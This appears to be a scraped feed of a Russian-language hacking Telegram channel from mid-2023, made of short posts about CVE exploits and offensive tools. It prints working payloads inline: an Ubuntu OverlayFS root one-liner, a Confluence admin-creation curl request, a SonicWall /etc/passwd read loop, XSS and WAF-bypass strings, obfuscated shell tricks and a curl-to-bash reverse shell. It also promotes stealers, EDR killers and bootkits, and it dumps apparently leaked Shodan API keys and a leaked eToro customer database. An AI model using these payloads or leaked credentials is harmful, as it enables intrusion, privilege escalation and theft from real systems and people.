PassTheCert*Бывает контроллеры домена не поддерживают PKINIT. Это может быть связано с тем, что в их сертификатах нет EKU для входа в систему со смарт-картой. Однако несколько протоколов, включая LDAP, поддерживают Schannel, обеспечивая таким образом аутентификацию через TLS. И вот пацаны с района (возможно Мытищи) создали небольшой инструмент для проверки концепции, который позволяет выполнять аутентификацию на сервере LDAP/S с сертификатом для всяких там атак.*LINK Images
2023-11-19 06:14:37
CVE-2023-46214 - Splunk RCE*Proof of concept exploit#splunk
2023-11-18 12:50:35
CVE-2023-4357 Chrome XXE*POCприкольно, осталось песочницу обойти 👌#chrome #sandbox Images Images
2023-11-17 19:36:07
CVE-2023-47246А вот и 0day который активно юзают рансомы из Cl0p нацеленный на SysAid*exploit* Images
2023-11-17 06:38:23
С днем рождения !!!Сегодня Proxy Bar исполняется 2 года ***Если Вам нравится то что мы делаем, Вы можете нас поддержать:***Bitcoin bc1qe8vmnxeqftjj7qynq8ljyv564j44wqaww8sa82Ethereum 0xa9626b33E39d904b6A48640cA89295323E7402A9Monero 43rmbgj7gy8fwAzuqWNNAbL3K3Eb54khZhY36gkRM8Vv6EVvEQFvSMBEhGyQDY43DWfEsbBY6msmR3GRGt4cC49yVs2jc8k#ДеньРождения
2023-11-16 09:34:00
Напоминаем ! Завтра пройдет встреча DEFCON Russia** Где: в самокатошной - Санкт-Петербург, ул. Малая Монетная, дом 2, литер Г, 6 этаж, БЦ «Лангензипен» * Во сколько: 17 ноября 2023 c 18:00 до 21:30 (сбор на пожрать и скинуть тулуп с 17 00)* Формат: офлайн + онлайн-трансляция* зарегистрироваться*Приходите, пообщаемся 😜#defcon #spb Images
2023-11-15 11:43:43
#eL_musico #SOF #8bit
2023-11-15 09:49:37
OpenVPN CVE-2023-46849 CVE-2023-46850делить на ноль не бросим 😄😄😄
2023-11-14 15:06:44
200+ PDFHacking and Infosec Link Images
2023-11-14 05:41:25
ved-ebpf: Kernel Exploit and Rootkit Detection using eBPFстатья - тутТулза VED-eBPF - тут#kernel #linux #ebpf #rootkit Images
2023-11-12 19:09:55
Это крутоСтудия Speakeasy Productions сняла и опубликовала в открытом доступе документальный фильм"eBPF: Unlocking the Kernel"
2023-11-10 20:25:00
update для CVE-2023-32629 и CVE-2023-2640BashСИшечка такая Images
2023-11-10 09:42:53
CVE-2023-32629 и CVE-2023-2640Ubuntu Privilege Escalation*BASH одной строкой:unshare -rm sh -c "mkdir l u w m && cp /u*/b*/p*3 l/;setcap cap_setuid+eip l/python3;mount -t overlay overlay -o rw,lowerdir=l,upperdir=u,workdir=w m && touch m/*; python3 -c 'import os;os.setuid(0);os.system(\"/bin/bash\")'"#ubuntu #lpe
2023-11-09 09:00:35
Сезон охоты за киберугрозами открыт. Получите навыки выявления аномалий в инфраструктуре с помощью формулировки гипотез и их дальнейшей проверки.Идет набор на практический курс по поиску киберугроз Threat Hunting, вы научитесь:— выявлять аномалии на хосте и в сетевом трафике, которые не были задетектированы стандартными средствами защиты;— отличать аномалии от легитимного поведения;— понимать мышление злоумышленника;— формулировать и проверять гипотезы о киберугрозах.Кстати, начать можете бесплатно — чтобы оценить, насколько вам подходит формат обучения. Images
2023-11-08 09:50:13
CVE-2023-46604 ActiveMQ RCEexploit + xml#activemq Images
2023-11-07 15:48:04
VEEAM 😋 Это кладезь привилегированных учетных записей (AD, Linux, Cloud)Лежат себе плохо привинченные, осталось только забрать.В общем читаем и погружаемся:1 - From VEEAM to Domain Administrator2 - Decrypting VEEAM Passwords3 - Используем тулзу SharpVeeamDecryptor#veeam #passwd Images
2023-11-06 20:02:32
Надо ребрендинг канала делать, просто золото ) Images
2023-11-06 19:07:15
CVE-2023-46251 - Stored DOM XSSMyBB < 1.8.37usage:[size='1337px;\">>\<img/src=ccc/ onerror=alert`1`//id=name //&pt;']eviltext[/size]UPD: impact Images
2023-11-06 09:09:55
CVE-2023-22518Confluence Data Center и Confluence Server*exploit.py Images
2023-11-05 21:25:48
Maltrail - Система обнаружения вредоносного трафикаRCE Exploit (version Maltrail-0.53)*exploit.py Images
2023-11-04 20:09:59
Linux hardening guideИнтересная версия еще одного гайда по усилению безопасности linux.Интересно про ptrace и memory allocatorLINK Images
2023-11-04 11:04:24
Give me a ping, Vasily Images
2023-11-04 10:59:37
List of Awesome CobaltStrike Resources link#cobalt Images
2023-11-02 13:00:20
левая короннаяправая похоронная Images
2023-11-02 09:31:02
exploit for cve-2023-46747 F5 BIG-IP unauthenticated remote code execution *exploit Images
2023-11-01 18:22:10
parts=(" /" "us" ";r" " /" ";b" "in" "; /" "who" "a" "mi" "")command="${parts[0]}${parts[1]}${parts[2]}${parts[3]}${parts[4]}${parts[5]}${parts[6]}${parts[7]}${parts[8]}${parts[9]}${parts[10]}"echo $command | tr -d ' ;' | shecho "00101111 01110101 01110011 01110010 00101111 01100010 01101001 01101110 00101111 01110111 01101000 01101111 01100001 01101101 01101001" | perl -lape '$_=pack"(B8)*",@F' | sh Images
2023-11-01 18:14:39
проклято )) Images
2023-11-01 18:10:03
$(echo -e "\x2f\x75\x73\x72\x2f\x62\x69\x6e\x2f\x77\x68\x6f\x61\x6d\x69") Images
2023-10-31 13:03:03
Cisco IOS XECVE-2023-20198POC creates a user named baduser with privilege level 15 Images
2023-10-31 10:16:33
book of secret knowledgeСудя по объему, кто то оцифровал утерянную Александрийскую библиотекуlink Images
2023-10-30 18:14:52
XAMPP v-3.3.0 Buffer Overflow (Unicode + SEH)POC#web #xamp
2023-10-29 06:13:57
Просыпаемся, завтракаем 😋 Images Images
2023-10-27 20:49:59
Собака старая, трюки новые. System Management Mode backdoor for UEFI based platforms*SmmBackdoorNg#backdoor #uefi #smm Images
2023-10-27 05:53:10
RCE on ingress-nginx-controller via Ingress spec.rules.http.paths.path field*Reported June 30, 2022Disclosed October 26, 2023link#nginx #k8s
2023-10-26 09:33:54
Script for DDoS attacks by EagleCyberCrew hXXp://47.88.79.56/ECC-DDoS/hXXp://47.88.79.56/succubus/ Images Images
2023-10-25 15:10:39
None
2023-10-24 20:28:28
v2rayNG Xray core and v2fly core client for Android#greypath
2023-10-24 09:45:28
CVE-2023-36745MS Exchange Server Privilege Escalationexploit#exchange
2023-10-23 11:53:14
😏 Images
2023-10-22 05:40:03
So cool ! ))))link#Назад_в_будущее Images
2023-10-22 05:19:57
Каждый раз смешно )))И мало того, оно даже документировано - Windows Internals part 2#remoteRegistry #135 Images
2023-10-21 04:50:28
CVE-2023-34051VMware Aria Operations for Logs *Technical Deep*Exploit#vmware #bypass #exploit Images
2023-10-20 18:55:34
Cloudflare bypass WAF*Payload:<inpuT autofocus oNFocus="setTimeout(function() { /*\`*/top['al'+'\u0065'+'rt']([!+[]+!+[]]+[![]+[]][+[]])/*\`*/ }, 5000);"></inpuT%3E&lT;/stYle&lT;/titLe&lT;/teXtarEa&lT;/scRipt&gT;#cloudflare #bypass #waf #xss
2023-10-19 19:54:59
Windows rootkit development for red teaming*Part 1 | IntroductionPart 2 | A tale of routines, IOCTLs and IRPsPart 3 | Sailing to the land of the user (and debugging the ship)Part 4 | The call back homePart 5 | Saruman's Manipulation*#malware #windows #rootkit
2023-10-18 18:50:03
or winamp 😜#humor Images
2023-10-18 06:36:14
Спасибо Julien Mousqueton за отличную подборку, сам то понял какой инструмент создал ? )))https://ransomware.live/#/status Images
2023-10-17 10:14:40
CVE-2023-2163Linux Kernel: eBPF verifier bug POC
2023-10-16 21:21:29
CVE-2023-44487уязвимость в протоколе HTTP/2Пока exploit (заточенный на DOS) ползал в дикой природе под атаку попали Google, AWS, CloudFlare \ etcПик атаки составлял 389 000 000 (да да) запросов в секунду.Ну и конечно же все это уплыло ))))Кстати интересный отчет есть у HAproxy, типа наша хата с краю и вообще наш балансировщик не ДоСится этой уязвимостью.link 1link 2link 3link 4link 5what the fuck notes #DoS #HA Images
2023-10-16 16:54:29
Windows Exploit Protection Settings (powerSHELL))linkТак, стоп, погодите...))) Images
2023-10-16 13:27:52
Ну только если в майку встроены наручники и трансфер до США )))) Images
2023-10-16 06:32:59
Палестино-израильский конфликтДействующие лица через призму мира хакеров и инфосекаСписки#again2012 Images
2023-10-15 14:33:39
vsftpd (для версии 2.3.4)usage:python3 vsftpd_exploit.py <IP address> <port> <command>
2023-10-15 14:04:39
CVE-2023-41993POC#Safari #iOS #iPadOS #macOS Images
2023-10-15 09:08:43
Криво пропатчили cve-2023-33297Получился bitcoin botnet ddos attackВидео + описание#btc Images
2023-10-15 08:56:59
macOS RootKit*Умеет фаззить двоичные файлы/драйверы, выполнять чтение/запись ядра, перехватывать функции ядра и пользовательского пространства, устанавливать пользовательские точки останова, заглушку GDB (в разработке), сопоставлять ядра KDK с символами отладки DWARF для выпуска ядер, MachO всех видов, общий доступ к dyld кэши, метаданные Objective C/Swift, библиотеки дампов, внедрение библиотек (например, cycript) и сканирование приложений iOS.
2023-10-14 11:49:33
OSCP, OSWE, OSEP, OSED, OSDA, OSWA, que OSWE, OSWP, EXP301, EXP312, WEB300, CEH , CEH v3, CEH v12, CCC , CKLP, Cisco CCNA 200-125 и еще тонна всегоскачать ((((если вы любитель испанского #soclose
2023-10-13 21:03:39
Extract the bitlocker recovery keys download2 сценария: linux\windows#bitlocker Images Images
2023-10-12 21:22:25
АНБ (National Security Agency, NSA) не спит ! И мы не будем.Совсем недавно они выкатывали свежий релиз GHIDRA, Но то ладно, мы со временем Сноудена привыкли. Сегодня выкатили репозиторий ELITEWOLF.В котором плавают различные сигнатуры и аналитика, ориентированные на ICS/SCADA/OT.Занятно, контроллеры там всякие, ребятам из АСУ ТП должно быть интересно.update: а еще интересно что для публикации они используют github, и каждый "отдел" создает свой ОТДЕЛЬНЫЙ репозиторий, прозрачнее не намекнуть ))) #NSA Images
2023-10-12 18:56:52
CVE-2023-27997 FortiGateРазбор - XORtigate: Pre-authentication Remote Code Execution on Fortigate VPNСкачать - exploitДырке 3 месяца - сколько успело проПатчиться расскажет shodan#fortigate #rce
2023-10-12 17:24:36
None Images
2023-10-12 17:24:35
None
2023-10-12 17:24:34
CVE-2023-42820Дырка в JumpServer (opensource хост-бастион) Usage:python CVE-2023-42820.py -t http://IP:Port -e email -u username
2023-10-12 15:40:55
берут на вооружение )))ShellBot Uses Hex IPs to Evade Detection in Attacks on Linux SSH Servers#hideIP #hex #16bit
2023-10-12 12:59:44
ДатаСексуалы на месте ? Вся туса в сборе: 0day,rce,dos,eop,xss и дюша метЁлкин Переходите сразу к таблицеТолько вот с CVE-2023-36778 НЕ угадали Images
2023-10-11 21:12:06
Внутри JS ?)) Images
2023-10-11 20:03:00
Cordyceps - род спорыньёвых грибов, пиреномицеты, паразитирующие на определённых видах насекомых. Домен: ЭукариотыЦарство: Грибы*А кроме того это самоинъекционный дроппер на C++, предназначенный для обхода EDR. download#bypass #edr Images
2023-10-11 18:44:04
CVE-2023-22515Confluence Data Center and Server - Broken Access Control VulnerabilityPOC:curl -k -X POST -H "X-Atlassian-Token: no-check" --data-raw "username=adm1n&fullName=admin&email=admin@confluence&password=adm1n&confirm=adm1n&setup-next-button=Next" http://confluence/setup/setupadministrator.action login - adm1n/adm1nПочитать как это работает Images
2023-10-11 12:18:31
Повышаем привилегии via apt-getвсегда смешно#linux #up Images Images
2023-10-11 07:56:31
Ох твою мать а, не было печали...)))))))))))))))))Короче, план такойНадеюсь консультанты из Xpanamas ciscoTalos
2023-10-11 07:43:03
CVE-2023-36802 windows Local Privilege EscalationUsage:Windows_MSKSSRV_LPE_CVE-2023-6802.exe <pid>где pid — это идентификатор процесса (в десятичном формате), который требуется повысить до SYSTEMPOC#win #lpe
2023-10-11 07:04:24
Update:How I made a heap overflow in curl#curl #libcurl #ssrf Images
2023-10-11 05:47:35
VULN in CURLget CVE-2023-38545 - поиграться (сегодня patch)#curl Images
2023-10-11 05:07:57
#бгг Images
2023-10-07 11:37:24
Более 100 Hacking / Infosec pdfread\download Images
2023-10-07 10:30:57
From C, with inline assembly, to shellcoderead#C #shell Images
2023-10-06 21:00:42
Abusing Active Directory Certificate ServicesPart One (5 october 2023)#AD Images
2023-10-06 18:20:45
Следим за трендами* exim RCE* Linux glibc LPE* curl RCE* WS_FTPd* admin/admin Images
2023-10-05 16:50:38
SupernovaReal fucking shellcode encryptor (бгг)download#shellcode #enc Images
2023-10-05 07:07:22
Свежий выпуск Inception 7 Images
2023-10-02 18:41:28
Спасибо всем кто поучаствовал. Отдельное спасибо юристу и правоведу #ran #redteam #malware Images
2023-10-01 07:06:26
CVE-2023-42793Authentication Bypass in JetBrains TeamCity CI/CD
2023-10-01 07:04:56
Интересное на почитать*When Exploits Arent Binary *Malware as a service (bunnyLoader)*#exploits #malware #read
2023-09-30 05:43:02
Что делать, если вас заставляют работать ?! Images
2023-09-29 17:40:51
OffensiveCon 2023Exploit Engineering – Attacking the Linux Kernel76Слайдов Images
2023-09-29 05:45:19
0-day для CVE-2023-4863 носится по интернету (chrome не при чем, дыра в libwebp image library).И все бы ничего, но libwebp интегрирована во всё (ну почти)Список покрытия
2023-09-28 13:17:55
CVE-2023-0126SonicWall SMA1000File Read BugPOC: cat file.txt| while read host do;do curl -sk "http://$host:8443/images//////////////////../../../../../../../../etc/passwd" | grep -i 'root:' && echo $host "is VULN";done
2023-09-28 12:23:34
CVE-2023-34040Spring-Kafka-Deserialization RCEPOC#apacheKafka
2023-09-28 07:45:13
CVE-2023-43770mail server Roundcube*usage:python cve-2023-43770.py -e attacker@gmail.com -p Attack3rPwd -t victim@example.com*POC exploit Images
2023-09-27 21:54:39
😂😂😂😂 Images
2023-09-27 18:06:52
CVE-2023-20209Cisco Expresswayexploit#cisco
2023-09-27 07:22:12
CVE-2023-29360Exploit for MSKSSRV.SYS driver POC exploit#lpe #win Images
2023-09-26 19:31:23
CVE-2023-29357Microsoft SharePoint Server (2019) Elevation of Privilege Vulnerability affected from 16.0.0 before 16.0.10399.20005 exploit
2023-09-22 10:24:29
PhoneSploit ProТеперь бгг универсальный (что бы это ни значило)download Images
2023-09-22 10:03:52
curlshellreverse shell using curl *usage:*Start your listener:./curlshell.py --certificate fullchain.pem --private-key privkey.pem --listen-port 1234On the remote side:curl https://curlshell:1234 | bashdownload#shell #curl
2023-09-20 20:32:57
Elasticsearch Stack Overflow VulnerabilityCVE-2023-31419 Exploit👌 Images
2023-09-19 20:23:08
PDF Images
2023-09-19 11:24:25
fortinet-ssl-vpn-bruteforce Images
2023-09-19 06:47:57
мало кто знает, но на самом деле днищще у ЦРУ 11 сентября Images
2023-09-19 06:37:47
Ну что ? протестировали с lockBit новый бот ?Все еще в дауне)) Images Images
2023-09-18 08:12:05
🤨 Images
2023-09-18 08:09:39
Burp Suite Plugins developmentread book#BurpSuite Images
2023-09-13 18:46:16
X64Hello
2023-09-12 14:42:56
Они и
2023-09-12 14:42:09
Гю
2023-08-30 07:44:28
VcenterKit - тулкит для эксплоитинга и POSTэксплуатации vmware Vcenter*Сплоитов не так много, пока, но оно легко расширяемое - VcenterKit.py*download#vmware #expl #post #kit Images Images
2023-08-29 15:27:08
CVE-2023-38388Mass Exploit - CVE-2023-38389 < Wordpress < JupiterX Core < Unauthenticated Account TakeoverDork : inurl: wp-content/plugins/jupiterx-core/POC exploit Images
2023-08-29 13:39:38
#ЦИПсО_Talos Images
2023-08-29 12:34:12
oracle java*POC Images
2023-08-29 12:19:52
CVE-2023-36844 , CVE-2023-36845 , CVE-2023-36846 , CVE-2023-36847*Update watchtowr-vs-junos_juniper_2023-08-25.py
2023-08-29 12:18:08
CVE-2023-38831Understanding WinRAR Code Execution
2023-08-26 06:46:15
Чортова МоскваСкорее б в Питер)))К расчлененочке))) Images
2023-08-25 10:45:44
ПриходитеДелитесь опытомКонтактами, Можно майками ))))....сами понимаете.... Images
2023-08-25 10:18:56
И внутрь)
2023-08-25 10:18:51
None Images
2023-08-25 10:18:33
А как вы думали, эти тусы для этого и существуют, руки пожать, мосты навести, проект замутить, etc. Приходите, даже на вход, поздороваемся, пообщаемся))))
2023-08-25 10:09:26
Норм ребята
2023-08-25 10:09:22
None Images
2023-08-24 13:29:39
None Images
2023-08-24 05:30:33
IIS - расшифровка данных без appcmd.exePOC Images
2023-08-23 19:35:11
Мир окон\мир дверей\пластмассовый мир победил - нетМИР шелловshells 2014 - 2023 Images
2023-08-23 13:37:10
Подготовка идёт) Images Images Images Images Images
2023-08-23 04:10:10
Мы ж хотели тебя через забор перекинуть, давай !!! Images
2023-08-23 03:54:25
Напоминаем, что завтра стартует конференция OffZoneПриходите, будет весело !#offzone #moscow #it #cybersec #2023 Images
2023-08-22 20:07:49
Exploitation of Openfire CVE-2023-32315Full WriteUpOpenfire-Bypass exploit Images
2023-08-22 09:21:28
xss.is вы там это, аккуратнее )https://xss.is/proxy.php?image=https%3A%2F%2Fdownloader.disk.yandex.ru%2Fpreview%2F8884af4bd817bbf0937c044879e6bf34afb2d95c1f14c493b4e39564fbdd2475%2F606426dc%2FmzcuBYol1Yb8wOc9K6NXQ_yNT_4nE1QLJw4LTWRpVOT5DDi0QJok4134hlurUPrtjlev1Ud-HWDKjiPFVQAMJw%253D%253D%3Fuid%3D0%26filename%3D%25D0%2590%25D0%25BD%25D0%25B0%25D0%25BB%25D0%25B8%25D0%25B7%2520%25D0%25B7%25D0%25B0%25D1%2589%25D0%25B8%25D1%2589%25D0%25B5%25D0%25BD%25D0%25BD%25D0%25BE%25D1%2581%25D1%2582%25D0%25B8%2520%25D0%25B1%25D0%25B5%25D1%2581%25D0%25BF%25D1%2580%25D0%25BE%25D0%25B2%25D0%25BE%25D0%25B4%25D0%25BD%25D1%258B%25D1%2585%2520%25D1%2581%25D0%25B5%25D1%2582%25D0%25B5%25D0%25B9.%2520%25D0%25A7%25D0%25B0%25D1%2581%25D1%2582%25D1%258C%25201.mp4%26disposition%3Dinline%26hash%3D%26limit%3D0%26content_type%3Dimage%252Fjpeg%26owner_uid%3D0%26tknv%3Dv2%26crop%3D1%26size%3D200x200&hash=35623f35aff8fe146f0dd9044667024d&return_error=1
2023-08-21 19:22:09
Sonicwall rce CVE-2023-34124*metasploit*use exploit/multi/http/sonicwall_shell_injection_cve_2023_34124ну да ну да 🙃Эксплойт объединяет 4-5 различных уязвимостей. Благодаря @fulmetalpackets
2023-08-21 14:41:04
HITCON 2023Демонстрация использования AMDCpuProfiler.sys в AMD. Запуская произвольную запись токена EPROCESS, достигается повышение привилегий до уровня SYSTEM. Отключение флага DSE позволяет загружать вредоносный неподписанный драйвер. В презентации также демонстрируется атака на 360 Total Security путем аннулирования его ObRegisterCallbacks, что позволяет выполнять вредоносные действия в процессах 360 Total Security.*Exploit#AMD Images
2023-08-21 08:49:27
CVE-2023-36874 уязвимость в службе отчетов об ошибках, связанная с повышением привилегий, позволявшая получить права администратора на устройстве Windows.*POC exploit*Read - exploit for 0-day Windows Error Reporting Service bug#windows #lpe Images
2023-08-20 11:57:01
OWASP Top 10 - video*download Images
2023-08-20 05:02:00
Отслеживание интересной малвари для Linux (и UNIX).Трэкнуть#linux #malware Images
2023-08-19 12:04:36
CVE-2023-20073Загрузка произвольного файла без проверки подлинности (XSS) в VPN-маршрутизаторах:Cisco RV340, RV340W, RV345, RV345P Usage:#!/usr/bin/bashTARGET="https://0.0.0.0"; \FILENAME="login.html"; \echo "<b>CVE-2023-20073</b> exploit test.<br><script>alert('JS-test')</script>" > $FILENAME; \curl -ksX POST "$TARGET/api/operations/ciscosb-file:form-file-upload" -H "Authorization: 1" -F "pathparam=Portal" -F "fileparam=${FILENAME}" -F "file.path=${FILENAME}" -F "file=@${FILENAME};type=application/octet-stream"; \echo "Access the uploaded file through the following link: $TARGET/$FILENAME"#cisco Images
2023-08-18 08:59:00
dir-300 еще никогда не был так опасен 😀 Images
2023-08-17 17:16:24
Что, если вы запустите сканирование nmap и ВСЕ 65535 портов будут открыты? -A PREROUTING -i eth0 -p tcp -m tcp --dport 23:65535 -j REDIRECT --to-ports 4444 Где 4444 HoneyPot, например.#HA-HA Images
2023-08-17 16:51:34
CVE-2023-3079 google chrome*exploit
2023-08-17 15:51:33
Тревожные кадры, а еще там xmprpc естьhttp://dramaalert.com/wp-includes/ Images
2023-08-17 05:09:53
RDP Credential Stealer*download*HowToUse#win #rdp Images
2023-08-16 13:42:29
Я календарь перевернуИ снова RATник в сентябре
2023-08-15 13:56:36
Продолжаем публиковать материалы с DefCon 31 SpamChannel Подделка писем с любого домена с помощью MailChannels (+2 миллиона доменов) Упор как всегда на DNS записи SPF и DMARC Пыщь/download
2023-08-15 07:19:41
Если нужно быстро сориентироваться по системным вызовам ядра Linux.Числа и параметры для различных архитектур и версий ядра.https://syscalls.mebeim.net#linux #syscalls #arch Images
2023-08-14 20:36:20
WPS Office RCEВерсии: WPS Office 2023 и WPS Office 2019writeUpProofOfConcept Images
2023-08-14 14:51:00
DllNotificationInectionИспользуя концепцию обратных вызовов уведомлений DLL в локальных и удаленных процессах можно вызвать Calc )*WriteUp "must have"*POC Images
2023-08-14 12:51:34
CVE-2023-36664Ghostscript command injection vulnerability PoC exploitexploit#ghostScript #exploit Images
2023-08-13 09:49:33
Продолжаем публиковать материалы с DefCon 31SpamChannelПодделка писем с любого домена с помощью MailChannels (+2 миллиона доменов)Упор как всегда на DNS записи SPF и DMARC Пыщь/download
2023-08-13 07:47:47
Утры Images
2023-08-12 06:16:52
Defcon 31 начинает приносить свои первые плодыPOC для обхода EDR в рамках злоупотребления Windows containers frameworkdownload#edr #bypass #defcon Images
2023-08-11 19:21:50
VED-eBPF: Kernel Exploit and Rootkit Detection using eBPF Go#linux #kernel Images
2023-08-11 11:15:42
SHODAN keys успевайтеOefcMxcunkm72Po71vVtX8zUN57vQtACPSKINdQe1GyxGgecYz2191H2JoS9qvgDpHHlgpFt8Ka3Stb5UlTxcaEwciOeF2QM61TvA2dNwxNxmWziZxKzR5aO9tFD00NjxTbXXOSBr0R65OcClImSwzadExoXU4tcEJV3A4Mka2wPs7P8VBCO6xcpRe27iNJumEuInz8UH1ixLGJq4oQhEiJORERVG5xclkY0ng0XMo29zEhzyw3ibQfeEBxghwPFsyeCnFndQ8TE4qAGvhm9nZLBZOBgoLKd7TeyFZ8oyLulHwYUOcSPzZ5w3cLYib61v4YpsPUJ3wjDxEqywwu6aF5OZKWj8kikdTNGRiwYNozXIDRf5DWyGNbkdiS5m3JKkdnzf4fsYWQmGajRDn3hB0RElbUlIaquboYedPn8iDWi6GDSO6h2kz72VLt6bZ3SFQNAMUdkeqXqVOdXsTLYeatFSpZSktdbOygcaGSSq46Lg5fZiADAuFxl4OBbn7zmXAbsu1Ruj5uhTNcxGdbGNgrh9WuMS1B6nkGd8uVE4oryfUVvioprswdKGmA5InzZXYdjHDeJM36AjDfU1feBsyMJIj8XxGzDEBeU0lGqtIO6yCxVFCWC4nUVbvovtjo5
2023-08-11 04:35:02
malware and #exploits http://103.89.15.53/ Images
2023-08-10 07:36:12
АнонсLPE 0daywin 10 - 11win_srv 2012 - 2016 - 2019 - 2022 Images
2023-08-10 05:47:30
Вот Вам мини трик (хейт спич) про OpenVPN.Если у вас linux и прости хоспаде NetworkManager (а в нем еще и плагин для всяких ipsec\vpn\wireguard\etc) и из него не конектит до сервера OpenVPN, но при этом если запускать руками через консоль, то все отлично работает. Тогда в консоли пишем journalctl -u NetworkManagerсреди кучи логов можно grepнуть:AUTH: Received control message: AUTH_FAILED,Data channel cipher negotiation failed (no shared cipher) Вторая ссылка гугла отправит нас в репозиторий openvpn, где белом по черному написано (см скрин), что клиент\сервер добазариться не могут чем шифровать наш траффик на госуслуги (не проплачено) и онлифанс (проплачено).И тут есть 2 пути, либо прописать в обоих конфигах нужный алгоритм шифрования, либо пойти в конфиг клиента и закоментить строку cipher.#vpn #кофе Images Images Images
2023-08-09 15:55:47
Обходим AntiMalware Scan interface в Windows 11 в 2023 году*powershell_assembly*#AMSI #win11 #яЕстьХочу Images
2023-08-09 11:42:52
CVE-2023-38182Microsoft Outlook 365 Пропатчено только вчераХостов много#outlook #1day Images
2023-08-09 07:27:28
АААААА 🤮 Images
2023-08-08 19:06:03
CVE-2023-34034Spring WebFlux Write-Up and POC Images
2023-08-07 11:31:30
CVE-2023-3269Linux kernel privilege escalation vulnerabilityexploit Images
2023-08-07 11:30:31
CVE-2023-3269 StackRot Linux kernel privilege escalation vulnerability Ждем ждем)) #linux #lpe
2023-07-31 13:12:31
ога блин, счастье , что инета нет или что ))))
2023-07-31 13:11:18
звони уже Балин)))
2023-07-31 13:11:09
None Images
2023-07-29 17:18:39
CVE-2023-35078 Уязвимость удаленного доступа к API Access vulnerability обнаружена в Ivanti Endpoint Manager Mobile (EPMM)POC exploit Images
2023-07-29 09:06:30
Напоминаю, что в эту субботу будет митап в Санкт-Петербурге. Одевайтесь по погоде и приезжайте на митап, будет интересно! Митап пройдет 29 июля, в 12:00 в Измайловском центре, м. Технологический институт, Измайловский пр., 2 / наб. р. Фонтанки, 120 Мероприятие…
2023-07-28 18:25:01
красивое Images
2023-07-28 17:22:57
Знаете, а я приду к Вам завтра )))
2023-07-28 15:18:39
Самый короткий exploit в мире (возможно)unshare -rm sh -c "mkdir l u w m && cp /u*/b*/p*3 l/;setcap cap_setuid+eip l/python3;mount -t overlay overlay -o rw,lowerdir=l,upperdir=u,workdir=w m && touch m/*;" && u/python3 -c 'import os;os.setuid(0);os.system("id")' Images
2023-07-28 11:33:56
Etoro.com DataBase.com200000 строк богатых людей Images
2023-07-28 08:25:17
Сисадмины с праздником. Вот вам подарок )CVE-2023-35885 Cloudpanel 1-day ExploitДля версий : v2.0.0 – v2.3.0Пропатчено : 20-06-2023 (v2.3.1)*Exploit + shell#праздникъ #клоунpanel #xploet #shыll Images
2023-07-27 16:36:35
О, прикольно !malware traffic analysis#malware Images
2023-07-27 15:47:02
CVE-2023-29336Дырка в драйвере ядра Win32k и эксплуатируется при открытии специально созданного падонками успешными людьми RTF-файла. LPE до systemАналитика#windows #lpe
2023-07-27 07:04:51
WSPCoercePoC для принудительной аутентификации с хостов Windows с использованием MS-WSP.Хост будет подключаться через SMB к хосту листенера, используя учетную запись компьютера.DOWNLOAD#windows #smb Images
2023-07-26 05:10:10
outlook email auth bypassdownload POC and read#outlook Images
2023-07-26 05:00:00
kernel-exploit-factoryLink Images
2023-07-24 11:51:42
Понедельники гавно) Images
2023-07-21 10:54:06
Любят всякие техники\админы\rootiNы\девопсы мультиплексоры типа gnu screen или tmux. Удобно красиво и небезопасно).Задавшись утром вопросом, как заставить его работать на себя (не трогая всякие bashrc и тд), путь был найден. В screen есть директива hardstatus string, которая посредством марсианского языка отрисовывает в терминале информативный статусБар (хостнейм\время\сессии и тд).Так вот, hardstatus string в качестве аргумента может принять и скрипт и линк))), ну а что в скрипте сами понимаете.Пока нашлось 2 способа, красивый марсианский и быдлоБытовой. Images Images
2023-07-21 08:42:31
BurpSuite PRO version 2023.7JAVA - 18
2023-07-20 13:35:35
Acunetix Premium v14.2.210505179 Full Activated 2023 + BACKDOOR только для постоянных подписчиковЗабавное видео#backdoor #acunetix #резилКоторогоНеБыло Images
2023-07-20 04:26:21
Kevin mitnickF
2023-07-19 17:09:20
OpenSSH RCE (forwarded ssh-agent)CVE-2023-38408Интересно#ssh Images
2023-07-19 13:44:42
ColdFusion XSSPOC:{{host}}/CFIDE/debug/cf_debugFr.cfm?userPage=javascript:alert(document.domain) Images
2023-07-18 17:27:32
От local admin до domain adminAV/EDR - тоже в отстое, потому что дублируется токен реального админа (если конечно запущен такой процесс)hypobrychium#windows #edr #av #admin Images
2023-07-17 16:32:20
#humor_or_not) Images
2023-07-17 13:33:16
CVE-2023-32117Google Drive Plugin, WordPress и отсутствие авторизации via REST API EndpointsPOC CURL ) Images Images
2023-07-17 12:33:24
GAP#BurpSuite Images
2023-07-16 14:15:04
CVE-2023-20110Cisco Smart Software Manager On-Prem SQL Injection Vulnerability exploit#cisco #sql #exploit
2023-07-16 08:12:03
HVNC for Cobalt Strike *Еще одна реализация, хотя сам протокол VNC не задействован (форк TinyNuke)покрытие:Windows Server 2022 x64Windows Server 2016 x64Windows Server 2012 R2 x64Windows Server 2008 x86Windows 7 SP1 x64Download#cobalt #hvnc Images
2023-07-15 14:09:59
Proxy bar в гостях у failover bar ) Images
2023-07-15 08:34:50
CVE-2023-37582 EXPLOITApache RocketMQ *Для теста присутствует RocketMQ environment via Docker*exploit*#apache #exploit #docker Images
2023-07-14 10:01:08
Пятничное#humor Images
2023-07-13 16:59:10
Если openVPN\wireguard не спасает (меня не спасает)то либо ipsec на свой сервер (но это муторно)заверните ВСЁ через ssh (sshuttle)одной командой:sshuttle -r root@TARGETHOST:22 0/0 -x TARGETHOST:22 --dns#ебаныйРКН
2023-07-13 04:45:34
CVE-2023-35803 Extreme Networks/Aerohive Wireless Access PointsPOC exploit Images
2023-07-12 18:51:30
О, интересно, только что сгрузили BlackLotus UEFI Windows Bootkit Сорцы\панелька\манЫть#bootkit Images
2023-07-12 12:58:14
SatIntelИзвлечение спутниковой телеметрии, получение орбитальных прогнозов и анализ TLE.Круто !!! Звучит как новое хоббиGet Images
2023-07-12 09:43:26
supermanKill The Protected Processdownload
2023-07-12 07:31:20
Кроба книгу написал)))#humor Images
2023-07-11 11:02:19
CVE-2023-24489Citrix ShareFile RCE🔥POC exploit + разбор#citrix Images
2023-07-11 05:50:50
Доброе утро, включаем рабочие машинки ! ) Images
2023-07-10 20:48:28
CVE-2023-31998exploit for Ubiquiti EdgeRouterРазбор уязвимости и POC exploit тут Images
2023-07-10 07:29:59
NimBlackoutЕще один киллер AV/EDRdownload
2023-07-10 07:15:35
Оу, какой стиллер))мефедр Phemedrone Stealer Приятный кач, демократические цены)))download#stealer Images
2023-07-09 17:38:43
